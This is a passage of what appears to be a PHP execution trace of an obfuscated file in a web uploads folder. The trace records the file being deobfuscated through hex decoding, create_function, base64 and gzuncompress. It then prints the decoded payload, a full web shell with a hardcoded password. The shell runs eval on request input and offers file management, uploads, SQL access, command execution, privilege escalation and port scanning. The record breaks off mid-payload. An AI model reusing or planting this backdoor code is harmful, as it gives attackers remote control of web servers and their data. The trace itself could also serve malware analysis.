3	157	0	0.005433	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6F'
3	157	1	0.005445	461136
3	157	R			111
3	158	0	0.005457	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	111
3	158	1	0.005469	461152
3	158	R			'o'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'o'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	159	0	0.005500	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	26	2
3	159	1	0.005515	461184
3	159	R			'6D'
3	160	0	0.005528	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6D'
3	160	1	0.005539	461136
3	160	R			109
3	161	0	0.005551	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	109
3	161	1	0.005563	461152
3	161	R			'm'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'm'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	162	0	0.005594	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	28	2
3	162	1	0.005608	461184
3	162	R			'70'
3	163	0	0.005621	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'70'
3	163	1	0.005636	461136
3	163	R			112
3	164	0	0.005648	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	112
3	164	1	0.005660	461152
3	164	R			'p'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'p'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	165	0	0.005691	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	30	2
3	165	1	0.005706	461184
3	165	R			'72'
3	166	0	0.005718	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'72'
3	166	1	0.005730	461136
3	166	R			114
3	167	0	0.005742	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	114
3	167	1	0.005754	461152
3	167	R			'r'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'r'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	168	0	0.005785	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	32	2
3	168	1	0.005799	461192
3	168	R			'65'
3	169	0	0.005812	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	169	1	0.005823	461144
3	169	R			101
3	170	0	0.005836	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	170	1	0.005848	461160
3	170	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	171	0	0.005879	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	34	2
3	171	1	0.005894	461192
3	171	R			'73'
3	172	0	0.005907	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	172	1	0.005918	461144
3	172	R			115
3	173	0	0.005931	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	173	1	0.005943	461160
3	173	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	174	0	0.005974	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	36	2
3	174	1	0.005989	461192
3	174	R			'73'
3	175	0	0.006002	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	175	1	0.006013	461144
3	175	R			115
3	176	0	0.006025	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	176	1	0.006037	461160
3	176	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	177	0	0.006067	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	38	2
3	177	1	0.006082	461192
3	177	R			'28'
3	178	0	0.006095	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'28'
3	178	1	0.006107	461144
3	178	R			40
3	179	0	0.006119	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	40
3	179	1	0.006131	461160
3	179	R			'('
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '('
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	180	0	0.006162	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	40	2
3	180	1	0.006177	461192
3	180	R			'62'
3	181	0	0.006190	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'62'
3	181	1	0.006202	461144
3	181	R			98
3	182	0	0.006214	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	98
3	182	1	0.006226	461160
3	182	R			'b'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'b'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	183	0	0.006257	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	42	2
3	183	1	0.006271	461192
3	183	R			'61'
3	184	0	0.006284	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'61'
3	184	1	0.006296	461144
3	184	R			97
3	185	0	0.006308	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	97
3	185	1	0.006320	461160
3	185	R			'a'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'a'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	186	0	0.006355	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	44	2
3	186	1	0.006369	461192
3	186	R			'73'
3	187	0	0.006381	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	187	1	0.006393	461144
3	187	R			115
3	188	0	0.006405	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	188	1	0.006417	461160
3	188	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	189	0	0.006448	461064	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	46	2
3	189	1	0.006462	461192
3	189	R			'65'
3	190	0	0.006475	461096	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	190	1	0.006487	461144
3	190	R			101
3	191	0	0.006499	461064	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	191	1	0.006511	461160
3	191	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	192	0	0.006541	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	48	2
3	192	1	0.006556	461200
3	192	R			'36'
3	193	0	0.006569	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'36'
3	193	1	0.006580	461152
3	193	R			54
3	194	0	0.006592	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	54
3	194	1	0.006605	461168
3	194	R			'6'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '6'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	195	0	0.006635	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	50	2
3	195	1	0.006650	461200
3	195	R			'34'
3	196	0	0.006662	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'34'
3	196	1	0.006674	461152
3	196	R			52
3	197	0	0.006686	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	52
3	197	1	0.006698	461168
3	197	R			'4'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '4'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	198	0	0.006728	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	52	2
3	198	1	0.006743	461200
3	198	R			'5F'
3	199	0	0.006755	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'5F'
3	199	1	0.006767	461152
3	199	R			95
3	200	0	0.006780	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	95
3	200	1	0.006792	461168
3	200	R			'_'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '_'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	201	0	0.006823	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	54	2
3	201	1	0.006837	461200
3	201	R			'64'
3	202	0	0.006850	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'64'
3	202	1	0.006861	461152
3	202	R			100
3	203	0	0.006874	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	100
3	203	1	0.006885	461168
3	203	R			'd'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'd'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	204	0	0.006916	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	56	2
3	204	1	0.006931	461200
3	204	R			'65'
3	205	0	0.006943	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	205	1	0.006955	461152
3	205	R			101
3	206	0	0.006967	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	206	1	0.006979	461168
3	206	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	207	0	0.007010	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	58	2
3	207	1	0.007025	461200
3	207	R			'63'
3	208	0	0.007040	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'63'
3	208	1	0.007052	461152
3	208	R			99
3	209	0	0.007064	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	99
3	209	1	0.007076	461168
3	209	R			'c'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'c'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	210	0	0.007107	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	60	2
3	210	1	0.007122	461200
3	210	R			'6F'
3	211	0	0.007134	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6F'
3	211	1	0.007146	461152
3	211	R			111
3	212	0	0.007158	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	111
3	212	1	0.007171	461168
3	212	R			'o'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'o'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	213	0	0.007201	461072	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	62	2
3	213	1	0.007216	461200
3	213	R			'64'
3	214	0	0.007228	461104	hexdec	0		/var/www/html/uploads/baru.php	11	1	'64'
3	214	1	0.007240	461152
3	214	R			100
3	215	0	0.007252	461072	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	100
3	215	1	0.007264	461168
3	215	R			'd'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'd'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	216	0	0.007295	461080	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	64	2
3	216	1	0.007310	461208
3	216	R			'65'
3	217	0	0.007322	461112	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	217	1	0.007334	461160
3	217	R			101
3	218	0	0.007346	461080	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	218	1	0.007358	461176
3	218	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	219	0	0.007389	461080	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	66	2
3	219	1	0.007404	461208
3	219	R			'28'
3	220	0	0.007416	461112	hexdec	0		/var/www/html/uploads/baru.php	11	1	'28'
3	220	1	0.007428	461160
3	220	R			40
3	221	0	0.007447	461080	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	40
3	221	1	0.007460	461176
3	221	R			'('
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '('
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	222	0	0.007492	461080	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	68	2
3	222	1	0.007507	461208
3	222	R			'27'
3	223	0	0.007519	461112	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	223	1	0.007531	461160
3	223	R			39
3	224	0	0.007544	461080	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	224	1	0.007556	461176
3	224	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
2	118	1	0.007588	461080
2	118	R			'\';eval(gzuncompress(base64_decode(\''
1		A						/var/www/html/uploads/baru.php	19	$filename = '$password=\'will\';$shellname=\'\';$myurl=\'\';eval(gzuncompress(base64_decode(\'eJzsvfl3XMdxKPwzdI7+h6vrMe+MNBjMYCMJcCCCWEhQIABhISUSPPNmuRhcYmbueBYsJPHHyHxJFFk5FimSWrhJJGVJpCTSIkXJOkriKI7zHH3Ke7ET2/GS81VVL7fvNhhQUhyfI9kS5nZXV3dXd1dXVVdX27lMvZGtNaKxwUcfKZhLVsWMGuWNbKFQM+t1Ix7JzI3NHh6bPWbMjcxOzMxnxicmx6aGD40Zx9USVbveqGapAP5Zs2sFNbu+bJZKlWzZhHz5211js1aCTPqLGdZSdG/RbGTK2aKVz3yvaTfMeqZYzUdjsVOPPtKxZNfMbH45GsnMTM/Na9m6FlnR0kNaZDWmsbRjkZXjWlqrN2pWtV7KQq31KOQOugrvH/OVhaTwopvUMKteNxtQenbs6YUxqEl0/ji1bblcsotWJdqNBfa'
2	225	0	0.007670	522392	create_function	0		/var/www/html/uploads/baru.php	20	2	''	'$password=\'will\';$shellname=\'\';$myurl=\'\';eval(gzuncompress(base64_decode(\'eJzsvfl3XMdxKPwzdI7+h6vrMe+MNBjMYCMJcCCCWEhQIABhISUSPPNmuRhcYmbueBYsJPHHyHxJFFk5FimSWrhJJGVJpCTSIkXJOkriKI7zHH3Ke7ET2/GS81VVL7fvNhhQUhyfI9kS5nZXV3dXd1dXVVdX27lMvZGtNaKxwUcfKZhLVsWMGuWNbKFQM+t1Ix7JzI3NHh6bPWbMjcxOzMxnxicmx6aGD40Zx9USVbveqGapAP5Zs2sFNbu+bJZKlWzZhHz5211js1aCTPqLGdZSdG/RbGTK2aKVz3yvaTfMeqZYzUdjsVOPPtKxZNfMbH45GsnMTM/Na9m6FlnR0kNaZDWmsbRjkZXjWlqrN2pWtV7KQq31KOQOugrvH/OVhaTwopvUMKteNxtQenbs6YUxqEl0/ji1bblcsotWJdqNBfa'
3	226	0	0.007910	708128	{internal eval}	1		/var/www/html/uploads/baru.php	20	0
3	226	1	0.007926	708128
3	226	R			NULL
2	225	1	0.007941	584904
2	225	R			'\000lambda_20'
1		A						/var/www/html/uploads/baru.php	20	$PHP = '\000lambda_20'
2	227	0	0.007969	584840	__lambda_func	1		/var/www/html/uploads/baru.php	20	0
2		A						/var/www/html/uploads/baru.php(20) : runtime-created function	1	$password = 'will'
2		A						/var/www/html/uploads/baru.php(20) : runtime-created function	1	$shellname = ''
2		A						/var/www/html/uploads/baru.php(20) : runtime-created function	1	$myurl = ''
3	228	0	0.008016	584840	base64_decode	0		/var/www/html/uploads/baru.php(20) : runtime-created function	1	1	'eJzsvfl3XMdxKPwzdI7+h6vrMe+MNBjMYCMJcCCCWEhQIABhISUSPPNmuRhcYmbueBYsJPHHyHxJFFk5FimSWrhJJGVJpCTSIkXJOkriKI7zHH3Ke7ET2/GS81VVL7fvNhhQUhyfI9kS5nZXV3dXd1dXVVdX27lMvZGtNaKxwUcfKZhLVsWMGuWNbKFQM+t1Ix7JzI3NHh6bPWbMjcxOzMxnxicmx6aGD40Zx9USVbveqGapAP5Zs2sFNbu+bJZKlWzZhHz5211js1aCTPqLGdZSdG/RbGTK2aKVz3yvaTfMeqZYzUdjsVOPPtKxZNfMbH45GsnMTM/Na9m6FlnR0kNaZDWmsbRjkZXjWlqrN2pWtV7KQq31KOQOugrvH/OVhaTwopvUMKteNxtQenbs6YUxqEl0/ji1bblcsotWJdqNBfaaq9lSIChkmutWY5ChjGRGpqefmhg75lDyuPZYWisX+qIihfWcgKmDCijlBGdp6bQmMRBYB7Q+b9srlmvc'
3	228	1	0.008246	646312
3	228	R			'xw\\q(3t14\030`#\tp XHP \000a!%\022<f\030\\bfx\026,$|I\024Y9\026)ZI$eI$"E:J(\034}{\023UU/6\030PR\034#\022vWWwWwWWUWW۹L5G\037)KVŌ\032lP3u#\036̍\036\036=f̍Ng\'&Ǧ\017\031\022Uިf\000Yk\0055lJlل|]cVL\031Rtold٢|i7zXGcS>ұdl~9\032Lkٺ\026YCZd5cZZ7jV^B(\016\n\037󕅤0^7\033Pzv1It8m\\V%ڍ\005R (dVcdF\030;PXZ+\027"\n(\004gi&1\020X\a>o+kܰ\000D\016)i'
3	229	0	0.009060	646280	gzuncompress	0		/var/www/html/uploads/baru.php(20) : runtime-created function	1	1	'xw\\q(3t14\030`#\tp XHP \000a!%\022<f\030\\bfx\026,$|I\024Y9\026)ZI$eI$"E:J(\034}{\023UU/6\030PR\034#\022vWWwWwWWUWW۹L5G\037)KVŌ\032lP3u#\036̍\036\036=f̍Ng\'&Ǧ\017\031\022Uިf\000Yk\0055lJlل|]cVL\031Rtold٢|i7zXGcS>ұdl~9\032Lkٺ\026YCZd5cZZ7jV^B(\016\n\037󕅤0^7\033Pzv1It8m\\V%ڍ\005R (dVcdF\030;PXZ+\027"\n(\004gi&1\020X\a>o+kܰ\000D\016)i'
3	229	1	0.011014	797864
3	229	R			'ob_start();\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'postpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($v);\r\n\tforeach($_GET as $k => $v) $_GET[$k] = stripslashes($v);\r\n}\r\nif(isset($_REQUEST[postpass])){\r\nhmlogin(2);\r\n@eval($_REQUEST[postpass]);\r\nexit;}\r\nif($_COOKIE[\'postpass\'] != md5(postpass)){\r\n\tif($_POST[\'postpass\']){\r\n\t\tif('
3	230	0	0.016667	1566608	eval	1	'ob_start();\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'postpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($v);\r\n\tforeach($_GET as $k => $v) $_GET[$k] = stripslashes($v);\r\n}\r\nif(isset($_REQUEST[postpass])){\r\nhmlogin(2);\r\n@eval($_REQUEST[postpass]);\r\nexit;}\r\nif($_COOKIE[\'postpass\'] != md5(postpass)){\r\n\tif($_POST[\'postpass\']){\r\n\t\tif($_POST[\'postpass\'] == postpass){\r\n\t\t\tsetcookie(\'postpass\',md5($_POST[\'postpass\']));\r\n\t\t\thmlogin();\r\n\t\t}else{\r\n\t\t\techo \'<CENTER>û</CENTER>\';\r\n\t\t}\r\n\t}\r\n\tislogin($shellname,$myurl);\r\n\texit;\r\n}\r\n\r\nif(isset($_GET[\'down\'])) do_down($_GET[\'down\']);\r\nif(isset($_GET[\'pack\'])){\r\n\t$dir = do_show($_GET[\'pack\']);\r\n\t$zip = new eanver($dir);\r\n\t$out = $zip->out;\r\n\tdo_download($out,$_SERVER[\'HTTP_HOST\'].".tar.gz");\r\n}\r\nif(isset($_GET[\'unzip\'])){\r\n\tcss_main();\r\n\tstart_unzip($_GET[\'unzip\'],$_GET[\'unzip\'],$_GET[\'todir\']);\r\n\texit;\r\n}\r\n\r\ndefine(\'root_dir\',str_replace(\'\\\\\',\'/\',dirname(myaddress)).\'/\');\r\ndefine(\'run_win\',substr(PHP_OS, 0, 3) == "WIN");\r\ndefine(\'my_shell\',str_path(root_dir.$_SERVER[\'SCRIPT_NAME\']));\r\n$eanver = isset($_GET[\'eanver\']) ? $_GET[\'eanver\'] : "";\r\n$doing = isset($_POST[\'doing\']) ? $_POST[\'doing\'] : "";\r\n$path = isset($_GET[\'path\']) ? $_GET[\'path\'] : root_dir;\r\n$name = isset($_POST[\'name\']) ? $_POST[\'name\'] : "";\r\n$img = isset($_GET[\'img\']) ? $_GET[\'img\'] : "";\r\n$p = isset($_GET[\'p\']) ? $_GET[\'p\'] : "";\r\n$pp = urlencode(dirname($p));\r\nif($img) css_img($img);\r\nif($eanver == "phpinfo") die(phpinfo());\r\nif($eanver == \'logout\'){\r\n\tsetcookie(\'postpass\',null);\r\n\tdie(\'<meta http-equiv="refresh" content="0;URL=?">\');\r\n}\r\n\r\n$class = array(\r\n"Ϣ" => array("upfiles" => "ϴļ","phpinfo" => "Ϣ","info_f" => "ϵͳϢ","phpcode" => "ִPHPű"),\r\n"Ȩ" => array("sqlshell" => "ִSQLִ","mysql_exec" => "MYSQL","myexp" => "MYSQLȨ","servu" => "Serv-UȨ","cmd" => "ִ","linux" => "Ȩ","downloader" => "ļ","port" => "˿ɨ"),\r\n"" => array("guama" => "","tihuan" => "滻","scanfile" => "ļ","scanphp" => "ľ"),\r\n"ű" => array("getcode" => "ߴ")\r\n);\r\n$msg = array("0" => "ɹ","1" => "ʧ","2" => "ϴɹ","3" => "ϴʧ","4" => "޸ĳɹ","5" => "޸ʧ","6" => "ɾɹ","7" => "ɾʧ");\r\ncss_main();\r\nswitch($eanver){\r\n\tcase "left":\r\n\tcss_left();\r\n\t\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items1\');\\" target=\\"_self\\">");\r\n\t\thtml_img("title");html_n(" Ӳ</a></dt><dd id=\\"items1\\" style=\\"display:block;\\"><ul>");\r\n    $ROOT_DIR = File_Mode();\r\n    html_n("<li><a title=\'$ROOT_DIR\' href=\'?eanver=main&path=$ROOT_DIR\' target=\'main\'>վĿ¼</a></li>");\r\n\thtml_n("<li><a href=\'?eanver=main\' target=\'main\'>Ŀ¼</a></li>");\r\n\tfor ($i=66;$i<=90;$i++){$drive= chr($i).\':\';\r\n    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;\r\n    html_n("<li><a title=\'$drive\' href=\'?eanver=main&path=$drive\' target=\'main\'>ش($drive)</a></li>");}}\r\n\thtml_n("</ul></dd></dl>");\r\n\t$i = 2;\r\n\tforeach($class as $name => $array){\r\n\t\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items$i\');\\" target=\\"_self\\">");\r\n\t\thtml_img("title");html_n(" $name</a></dt><dd id=\\"items$i\\" style=\\"display:block;\\"><ul>");\r\n\t\tforeach($array as $url => $value){\r\n\t\t\thtml_n("<li><a href=\\"?eanver=$url\\" target=\'main\'>$value</a></li>");\r\n\t\t}\r\n\t\thtml_n("</ul></dd></dl>");\r\n\t\t$i++;\r\n\t}\r\n\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items$i\');\\" target=\\"_self\\">");\r\n\thtml_img("title");html_n(" </a></dt><dd id=\\"items$i\\" style=\\"display:block;\\"><ul>");\r\n    html_n("<li><a title=\'ȫ˳\' href=\'?eanver=logout\' target=\\"main\\">ȫ˳</a></li>");\r\n\thtml_n("</ul></dd></dl>");\r\n\thtml_n("</div>");\r\n\tbreak;\r\n\t\r\n\tcase "main":\r\n\tcss_js("1");\r\n\t$dir = @dir($path);\r\n\t$REAL_DIR = File_Str(realpath($path));\r\n\tif(!empty($_POST[\'actall\'])){echo \'<div class="actall">\'.File_Act($_POST[\'files\'],$_POST[\'actall\'],$_POST[\'inver\'],$REAL_DIR).\'</div>\';}\r\n\t$NUM_D = $NUM_F = 0;\r\n\tif(!$_SERVER[\'SERVER_NAME\']) $GETURL = \'\'; else $GETURL = \'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\';\r\n\t$ROOT_DIR = File_Mode();\r\n\thtml_n("<table width=\\"100%\\" border=0 bgcolor=\\"#555555\\"><tr><td><form method=\'GET\'>ַ:<input type=\'hidden\' name=\'eanver\' value=\'main\'>");\r\n\thtml_n("<input type=\'text\' size=\'80\' name=\'path\' value=\'$path\'> <input type=\'submit\' value=\'ת\'></form>");\r\n\thtml_n("<br><form method=\'POST\' enctype=\\"multipart/form-data\\" action=\'?eanver=editr&p=".urlencode($path)."\'>");\r\n\thtml_n("<input type=\\"button\\" value=\\"½ļ\\" onclick=\\"rusurechk(\'newfile.php\',\'?eanver=editr&p=".urlencode($path)."&refile=1&name=\');\\"> <input type=\\"button\\" value=\\"½Ŀ¼\\" onclick=\\"rusurechk(\'newdir\',\'?eanver=editr&p=".urlencode($path)."&redir=1&name=\');\\">");\r\n\thtml_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");\r\n\thtml_input("submit","uploadt","ϴ");\r\n\tif(!empty($_POST[\'newfile\'])){\r\n\t\tif(isset($_POST[\'bin\'])) $bin = $_POST[\'bin\']; else $bin = "wb";\r\n        $newfile=base64_decode($_POST[\'newfile\']);\r\n\t\tif(strtolower($_POST[\'charset\'])==\'utf-8\'){$txt=base64_decode($_POST[\'txt\']);}else{$txt=$_POST[\'txt\'];}\r\n        if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST[\'charset\'])==\'gb2312\') or (strtolower($_POST[\'charset\'])==\'gbk\')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST[\'txt\']));}else{$txt = array_iconv($txt);}}\r\n\t\techo do_write($newfile,$bin,$txt) ? \'<br>\'.$newfile.\' \'.$msg[0] : \'<br>\'.$newfile.\' \'.$msg[1];\r\n\t\t@touch($newfile,@strtotime($_POST[\'time\']));\r\n\t}\r\n\thtml_n(\'</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=\'.$path.\'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>\');\r\n\thtml_a(\'?eanver=main&path=\'.uppath($path),\'<b>ϼĿ¼</b>\');\r\n\thtml_n(\'</b></td><td align="center" width="10%"><b></b></td><td align="center" width="5%"><b>ļ</b></td>\');\r\n\thtml_n(\'<td align="center" width="8%"><b>(\'.get_current_user().\')û|</b></td>\');\r\n\thtml_n(\'<td align="center" width="10%"><b>޸ʱ</b></td><td align="center" width="10%"><b>ļС</b></td></tr>\');\r\n\twhile($dirs = @$dir->read()){\r\n\t\tif($dirs == \'.\' or $dirs == \'..\') continue;\r\n\t\t$dirpath = str_path("$path/$dirs");\r\n\t\tif(is_dir($dirpath)){\r\n\t\t\t$perm = substr(base_convert(fileperms($dirpath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($dirpath));\r\n\t\t\t$dirpath = urlencode($dirpath);\r\n\t\t\thtml_n(\'<tr height="25"><td><input type="checkbox" name="files[]" value="\'.$dirs.\'">\');\r\n\t\t\thtml_img("dir");\r\n\t\t\thtml_a(\'?eanver=main&path=\'.$dirpath,$dirs);\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'$dirs\',\'?eanver=rename&p=$dirpath&newname=\');return false;\\"></a>");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusuredel(\'$dirs\',\'?eanver=deltree&p=$dirpath\');return false;\\">ɾ</a> ");\r\n\t\t\thtml_a(\'?pack=\'.$dirpath,\'\');\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$dirpath.\'&chmod=\'.$perm,$perm);\r\n            html_n(\'</td><td align="center">\'.GetFileOwner("$path/$dirs").\':\'.GetFileGroup("$path/$dirs"));\r\n\t\t\thtml_n(\'</td><td align="center">\'.$filetime.\'</td><td align="right">\');\r\n\t\t\thtml_n(\'</td></tr>\');\r\n\t\t\t$NUM_D++;\r\n\t\t}\r\n\t}\r\n\t@$dir->rewind();\r\n\twhile($files = @$dir->read()){\r\n\t\tif($files == \'.\' or $files == \'..\') continue;\r\n\t\t$filepath = str_path("$path/$files");\r\n\t\tif(!is_dir($filepath)){\r\n\t\t\t$fsize = @filesize($filepath);\r\n\t\t\t$fsize = File_Size($fsize);\r\n\t\t\t$perm  = substr(base_convert(fileperms($filepath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($filepath));\r\n\t\t\t$Fileurls = str_replace(File_Str($ROOT_DIR.\'/\'),$GETURL,$filepath);\r\n\t\t\t$todir=$ROOT_DIR.\'/zipfile\';\r\n\t\t\t$filepath = urlencode($filepath);\r\n\t\t\t$it=substr($filepath,-3);\r\n\t\t\thtml_n(\'<tr height="25"><td><input type="checkbox" name="files[]" 